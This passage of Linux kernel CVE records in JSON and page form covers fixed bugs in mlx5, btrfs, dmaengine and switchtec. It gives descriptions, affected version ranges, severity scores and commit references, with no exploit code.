"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.10"
},
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.156",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.156",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Properly link new fs rules into the tree\n\nPreviously, add_rule_fg would only add newly created rules from the\nhandle into the tree when they had a refcount of 1. On the other hand,\ncreate_flow_handle tries hard to find and reference already existing\nidentical rules instead of creating new ones.\n\nThese two behaviors can result in a situation where create_flow_handle\n1) creates a new rule and references it, then\n2) in a subsequent step during the same handle creation references it\n again,\nresulting in a rule with a refcount of 2 that is not linked into the\ntree, will have a NULL parent and root and will result in a crash when\nthe flow group is deleted because del_sw_hw_rule, invoked on rule\ndeletion, assumes node-\u003eparent is != NULL.\n\nThis happened in the wild, due to another bug related to incorrect\nhandling of duplicate pkt_reformat ids, which lead to the code in\ncreate_flow_handle incorrectly referencing a just-added rule in the same\nflow handle, resulting in the problem described above. Full details are\nat [1].\n\nThis patch changes add_rule_fg to add new rules without parents into\nthe tree, properly initializing them and avoiding the crash. This makes\nit more consistent with how rules are added to an FTE in\ncreate_flow_handle."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:09:16.502Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/de0139719cdda82806a47580ca0df06fc85e0bd2"
},
{
"url": "https://git.kernel.org/stable/c/1263b0b26077b1183c3c45a0a2479573a351d423"
},
{
"url": "https://git.kernel.org/stable/c/3d90ca9145f6b97b38d0c2b6b30f6ca6af9c1801"
},
{
"url": "https://git.kernel.org/stable/c/7aaee12b804c5e0374e7b132b6ec2158ff33dd64"
},
{
"url": "https://git.kernel.org/stable/c/2e8dc5cffc844dacfa79f056dea88002312f253f"
},
{
"url": "https://git.kernel.org/stable/c/5cf5337ef701830f173b4eec00a4f984adeb57a0"
},
{
"url": "https://git.kernel.org/stable/c/adf67a03af39095f05d82050f15813d6f700159d"
},
{
"url": "https://git.kernel.org/stable/c/7c6782ad4911cbee874e85630226ed389ff2e453"
}
],
"title": "net/mlx5: Properly link new fs rules into the tree",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35960",
"datePublished": "2024-05-20T09:41:51.900Z",
"dateReserved": "2024-05-17T13:50:33.137Z",
"dateUpdated": "2025-05-04T09:09:16.502Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26791 (GCVE-0-2024-26791)
Vulnerability from cvelistv5
Published
2024-04-04 08:20
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: dev-replace: properly validate device names
There's a syzbot report that device name buffers passed to device
replace are not properly checked for string termination which could lead
to a read out of bounds in getname_kernel().
Add a helper that validates both source and target device name buffers.
For devid as the source initialize the buffer to empty string in case
something tries to read it later.
This was originally analyzed and fixed in a different way by Edward Adam
Davis (see links).
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.455Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/11d7a2e429c02d51e2dc90713823ea8b8d3d3a84"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c6652e20d7d783d060fe5f987eac7b5cabe31311"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2886fe308a83968dde252302884a1e63351cf16d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ab2d68655d0f04650bef09fee948ff80597c5fb9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f590040ce2b712177306b03c2a63b16f7d48d3c8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b1690ced4d2d8b28868811fb81cd33eee5aefee1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/343eecb4ff49a7b1cc1dfe86958a805cf2341cfb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9845664b9ee47ce7ee7ea93caf47d39a9d4552c4"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26791",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:50:58.820208Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:50.626Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/dev-replace.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "11d7a2e429c02d51e2dc90713823ea8b8d3d3a84",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c6652e20d7d783d060fe5f987eac7b5cabe31311",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2886fe308a83968dde252302884a1e63351cf16d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ab2d68655d0f04650bef09fee948ff80597c5fb9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f590040ce2b712177306b03c2a63b16f7d48d3c8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b1690ced4d2d8b28868811fb81cd33eee5aefee1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "343eecb4ff49a7b1cc1dfe86958a805cf2341cfb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9845664b9ee47ce7ee7ea93caf47d39a9d4552c4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/dev-replace.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.309",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.309",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: dev-replace: properly validate device names\n\nThere\u0027s a syzbot report that device name buffers passed to device\nreplace are not properly checked for string termination which could lead\nto a read out of bounds in getname_kernel().\n\nAdd a helper that validates both source and target device name buffers.\nFor devid as the source initialize the buffer to empty string in case\nsomething tries to read it later.\n\nThis was originally analyzed and fixed in a different way by Edward Adam\nDavis (see links)."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:37.164Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/11d7a2e429c02d51e2dc90713823ea8b8d3d3a84"
},
{
"url": "https://git.kernel.org/stable/c/c6652e20d7d783d060fe5f987eac7b5cabe31311"
},
{
"url": "https://git.kernel.org/stable/c/2886fe308a83968dde252302884a1e63351cf16d"
},
{
"url": "https://git.kernel.org/stable/c/ab2d68655d0f04650bef09fee948ff80597c5fb9"
},
{
"url": "https://git.kernel.org/stable/c/f590040ce2b712177306b03c2a63b16f7d48d3c8"
},
{
"url": "https://git.kernel.org/stable/c/b1690ced4d2d8b28868811fb81cd33eee5aefee1"
},
{
"url": "https://git.kernel.org/stable/c/343eecb4ff49a7b1cc1dfe86958a805cf2341cfb"
},
{
"url": "https://git.kernel.org/stable/c/9845664b9ee47ce7ee7ea93caf47d39a9d4552c4"
}
],
"title": "btrfs: dev-replace: properly validate device names",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26791",
"datePublished": "2024-04-04T08:20:22.374Z",
"dateReserved": "2024-02-19T14:20:24.178Z",
"dateUpdated": "2025-05-04T08:56:37.164Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52492 (GCVE-0-2023-52492)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: fix NULL pointer in channel unregistration function
__dma_async_device_channel_register() can fail. In case of failure,
chan->local is freed (with free_percpu()), and chan->local is nullified.
When dma_async_device_unregister() is called (because of managed API or
intentionally by DMA controller driver), channels are unconditionally
unregistered, leading to this NULL pointer:
[ 1.318693] Unable to handle kernel NULL pointer dereference at virtual address 00000000000000d0
[...]
[ 1.484499] Call trace:
[ 1.486930] device_del+0x40/0x394
[ 1.490314] device_unregister+0x20/0x7c
[ 1.494220] __dma_async_device_channel_unregister+0x68/0xc0
Look at dma_async_device_register() function error path, channel device
unregistration is done only if chan->local is not NULL.
Then add the same condition at the beginning of
__dma_async_device_channel_unregister() function, to avoid NULL pointer
issue whatever the API used to reach this function.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d2fb0a0438384fee08a418025f743913020033ce Version: d2fb0a0438384fee08a418025f743913020033ce Version: d2fb0a0438384fee08a418025f743913020033ce Version: d2fb0a0438384fee08a418025f743913020033ce Version: d2fb0a0438384fee08a418025f743913020033ce Version: d2fb0a0438384fee08a418025f743913020033ce |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52492",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-11T18:32:39.400118Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T19:02:52.592Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.973Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9de69732dde4e443c1c7f89acbbed2c45a6a8e17"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/047fce470412ab64cb7345f9ff5d06919078ad79"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2ab32986a0b9e329eb7f8f04dd57cc127f797c08"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7f0ccfad2031eddcc510caf4e57f2d4aa2d8a50b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9263fd2a63487c6d04cbb7b74a48fb12e1e352d0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f5c24d94512f1b288262beda4d3dcb9629222fc7"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/dma/dmaengine.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9de69732dde4e443c1c7f89acbbed2c45a6a8e17",
"status": "affected",
"version": "d2fb0a0438384fee08a418025f743913020033ce",
"versionType": "git"
},
{
"lessThan": "047fce470412ab64cb7345f9ff5d06919078ad79",
"status": "affected",
"version": "d2fb0a0438384fee08a418025f743913020033ce",
"versionType": "git"
},
{
"lessThan": "2ab32986a0b9e329eb7f8f04dd57cc127f797c08",
"status": "affected",
"version": "d2fb0a0438384fee08a418025f743913020033ce",
"versionType": "git"
},
{
"lessThan": "7f0ccfad2031eddcc510caf4e57f2d4aa2d8a50b",
"status": "affected",
"version": "d2fb0a0438384fee08a418025f743913020033ce",
"versionType": "git"
},
{
"lessThan": "9263fd2a63487c6d04cbb7b74a48fb12e1e352d0",
"status": "affected",
"version": "d2fb0a0438384fee08a418025f743913020033ce",
"versionType": "git"
},
{
"lessThan": "f5c24d94512f1b288262beda4d3dcb9629222fc7",
"status": "affected",
"version": "d2fb0a0438384fee08a418025f743913020033ce",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/dma/dmaengine.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: fix NULL pointer in channel unregistration function\n\n__dma_async_device_channel_register() can fail. In case of failure,\nchan-\u003elocal is freed (with free_percpu()), and chan-\u003elocal is nullified.\nWhen dma_async_device_unregister() is called (because of managed API or\nintentionally by DMA controller driver), channels are unconditionally\nunregistered, leading to this NULL pointer:\n[ 1.318693] Unable to handle kernel NULL pointer dereference at virtual address 00000000000000d0\n[...]\n[ 1.484499] Call trace:\n[ 1.486930] device_del+0x40/0x394\n[ 1.490314] device_unregister+0x20/0x7c\n[ 1.494220] __dma_async_device_channel_unregister+0x68/0xc0\n\nLook at dma_async_device_register() function error path, channel device\nunregistration is done only if chan-\u003elocal is not NULL.\n\nThen add the same condition at the beginning of\n__dma_async_device_channel_unregister() function, to avoid NULL pointer\nissue whatever the API used to reach this function."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:55.393Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9de69732dde4e443c1c7f89acbbed2c45a6a8e17"
},
{
"url": "https://git.kernel.org/stable/c/047fce470412ab64cb7345f9ff5d06919078ad79"
},
{
"url": "https://git.kernel.org/stable/c/2ab32986a0b9e329eb7f8f04dd57cc127f797c08"
},
{
"url": "https://git.kernel.org/stable/c/7f0ccfad2031eddcc510caf4e57f2d4aa2d8a50b"
},
{
"url": "https://git.kernel.org/stable/c/9263fd2a63487c6d04cbb7b74a48fb12e1e352d0"
},
{
"url": "https://git.kernel.org/stable/c/f5c24d94512f1b288262beda4d3dcb9629222fc7"
}
],
"title": "dmaengine: fix NULL pointer in channel unregistration function",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52492",
"datePublished": "2024-02-29T15:52:10.499Z",
"dateReserved": "2024-02-20T12:30:33.304Z",
"dateUpdated": "2025-05-04T07:37:55.393Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52617 (GCVE-0-2023-52617)
Vulnerability from cvelistv5
Published
2024-03-18 10:19
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
PCI: switchtec: Fix stdev_release() crash after surprise hot remove
A PCI device hot removal may occur while stdev->cdev is held open. The call
to stdev_release() then happens during close or exit, at a point way past
switchtec_pci_remove(). Otherwise the last ref would vanish with the
trailing put_device(), just before return.
At that later point in time, the devm cleanup has already removed the
stdev->mmio_mrpc mapping. Also, the stdev->pdev reference was not a counted
one. Therefore, in DMA mode, the iowrite32() in stdev_release() will cause
a fatal page fault, and the subsequent dma_free_coherent(), if reached,
would pass a stale &stdev->pdev->dev pointer.
Fix by moving MRPC DMA shutdown into switchtec_pci_remove(), after
stdev_kill(). Counting the stdev->pdev ref is now optional, but may prevent
future accidents.
Reproducible via the script at
https://lore.kernel.org/r/20231113212150.96410-1-dns@arista.com
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52617",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-10T20:25:20.462363Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-10T20:25:39.733Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.360Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d8c293549946ee5078ed0ab77793cec365559355"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a5d0528cf19dbf060313dffbe047bc11c90c24c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ff1c7e2fb9e9c3f53715fbe04d3ac47b80be7eb8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1d83c85922647758c1f1e4806a4c5c3cf591a20a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0233b836312e39a3c763fb53512b3fa455b473b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e129c7fa7070fbce57feb0bfc5eaa65eef44b693"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/df25461119d987b8c81d232cfe4411e91dcabe66"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/pci/switch/switchtec.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d8c293549946ee5078ed0ab77793cec365559355",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4a5d0528cf19dbf060313dffbe047bc11c90c24c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ff1c7e2fb9e9c3f53715fbe04d3ac47b80be7eb8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1d83c85922647758c1f1e4806a4c5c3cf591a20a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0233b836312e39a3c763fb53512b3fa455b473b3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e129c7fa7070fbce57feb0bfc5eaa65eef44b693",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "df25461119d987b8c81d232cfe4411e91dcabe66",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
